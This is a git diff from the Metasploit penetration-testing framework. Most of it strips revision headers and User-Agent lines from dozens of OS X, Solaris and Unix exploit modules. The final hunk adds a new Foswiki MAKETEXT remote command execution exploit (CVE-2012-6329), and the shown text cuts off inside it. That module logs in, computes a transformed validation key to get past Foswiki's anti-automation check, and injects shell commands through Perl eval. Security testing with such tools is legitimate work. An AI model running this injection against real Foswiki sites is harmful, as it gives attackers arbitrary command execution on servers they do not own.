commercial restrictions. Please see the Metasploit @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0848'], diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index 8037c600ce..3809c46e23 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Moritz Jodeit ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-5863'], diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index 2fa2978010..08cb63b138 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0395'], diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index 292e3c800b..41b8219d03 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'ddz', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0695'], diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 02a9aa5581..34cf536237 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Paul Harrington', # Original Exploit Author and MSF Module 'dookie', # MSF Module Assistance ], - 'Version' => '$Revision$', 'Platform' => 'osx', 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index acdfb62d9d..7389b892dd 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'ddz' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '35142' ], diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index a84035435a..56f998fad0 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # OSX Exploit Author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65689' ], diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 5d071eaf46..b1851c4b25 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', # Description? 'Author' => 'unknown', - 'Version' => '$Revision$', 'Platform' => 'osx', 'References' => [ diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index a4e37fd3bc..10b4a4812d 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index f486343cfd..fbee422769 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote exploiting the bug on Mac OS X PowerPC systems. }, 'Author' => [ 'hdm', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index b0e5d8738a..f9e7e8c552 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'noir ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0803'], diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index faa54e71f8..05a5daf3bc 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'ddz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-1583'], diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 18a8835028..09bf4efacb 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 15cfc28d01..2ef9fa64ba 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 81216f0746..5be0f26242 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ramon de C Valle', 'Adriano Lima ', ], - 'Version' => '$Revision$', 'Arch' => ARCH_X86, 'Platform' => 'solaris', 'References' => diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 3d688f8bc5..9a2d955794 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'vlad902 ', 'hdm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0722'], diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index b72909e874..393fc48b41 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'I)ruid ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0209'], diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 284fe48e88..3edeabe0ac 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0882' ], diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 4fde4b7879..4593f7a168 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0797'], diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 8d5c1fed92..3771bfa58b 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'darkharper2' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69562'], diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 06b7215d06..790c55dcf8 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '73573'], diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 370d9c7ec2..bd6c32ac91 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_CMD ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54551' ], diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 711f214f9b..0b889c22c1 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Spencer McIntyre', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2763' ], diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index 4024049f1e..4235a82847 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2075' ], diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 84f54c307a..b7dd86d672 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2687'], diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 2819153a46..653c870f19 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2447' ], diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 6c1bf94a97..8ec179bbbc 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4502' ], diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 750b6aa16c..e64cd1fd27 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4560' ], diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index 91ed48155e..c2f44a16f8 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -52,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4344' ], diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index 33bf1006c7..f4c299facb 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Matteo Cantoni ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-0116'], @@ -84,7 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 9d9610bd3d..41fc73a8ae 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2237'], @@ -88,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 371efa6070..d1f5daa5fb 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-3922'], @@ -83,7 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index f0f2f8c59d..71bd64e934 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Nicolas Gregoire ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2847'], diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 4fa4e9d1b9..e4c138d430 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2685' ], diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 842e744e8d..ecabfff37f 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'David Maciejak ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '17539' ], diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index a3ddb0bc8a..61acc4dc56 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felix Wilhelm', # poc ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69352' ], diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index d0fe3a3f62..c92824d02a 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Erwin Paternotte', # Exploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4566' ], diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index e31539dc52..da9d4193e2 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0506' ], diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index abe79ede7d..b836beb0f8 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54707' ], diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb new file mode 100644 index 0000000000..efafb4031c --- /dev/null +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -0,0 +1,239 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Foswiki MAKETEXT Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using + a specially crafted MAKETEXT, a malicious user can execute shell commands since the + input is passed to the Perl "eval" command without first being sanitized. The + problem is caused by an underlying security issue in the CPAN:Locale::Maketext + module. Only Foswiki sites that have user interface localization enabled + (UserInterfaceInternationalisation variable set) are vulnerable. + + If USERNAME and PASSWORD aren't provided, anonymous access will be tried. + Also, if the FoswikiPage option isn't provided, the module will try to create a + random page on the SandBox space. The modules has been tested successfully on + Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image. + }, + 'Author' => + [ + 'Brian Carlson', # original discovery in Perl Locale::Maketext + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6329' ], + [ 'OSVDB', '88410' ], + [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ] + ], + 'Privileged' => false, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic ruby python bash telnet' + } + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Foswiki 1.1.5', { }]], + 'DisclosureDate' => 'Dec 03 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Foswiki base path", "/" ]), + OptString.new('FoswikiPage', [ false, "Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]), + OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), + OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) + ], self.class) + end + + def do_login(username, password) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}bin/login", + 'vars_post' => + { + 'username' => username, + 'password' => password + } + }) + + if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + vprint_status "#{res.code}\n#{res.body}" + return nil + end + + session = $1 + return session + end + + def inject_code(session, code) + + vprint_status("Retrieving the validation_key...") + + res = send_request_cgi({ + 'uri' => "#{@base}bin/edit#{@page}", + 'cookie' => "FOSWIKISID=#{session}" + }) + + if not res or res.code != 200 or res.body !~ /name='validation_key' value='\?([0-9a-f]*)'/ + vprint_error("Error retrieving the validation_key") + return nil + end + + validation_key = $1 + vprint_good("validation_key found: #{validation_key}") + + if session.empty? + if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + session = $1 + else + vprint_error("Error using anonymous access") + return nil + end + end + + if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + strike_one = $1 + else + vprint_error("Error getting the FOSWIKISTRIKEONE value") + return nil + end + + # Transforming validation_key in order to bypass foswiki antiautomation + validation_key = Rex::Text.md5(validation_key + strike_one) + vprint_status("Transformed validation key: #{validation_key}") + vprint_status("Injecting the payload...") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{@base}bin/save#{@page}", + 'cookie' => "FOSWIKISID=#{session}", + 'vars_post' => + { + 'validation_key' => validation_key, + 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\'}; `#{code}`; { #\" args=\"#{rand_text_alpha(3 + rand(3))}\"}%" + } + + }) + + if not res or res.code != 302 or res.headers['Location'] !~ /bin\/view#{@page}/ + print_warning("Error injecting the payload") + print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}" + return nil + end + + location = URI(res.headers['Location']).path + print_good("Payload injected on #{location}") + + return location + end + + def check + @base = target_uri.path + @base 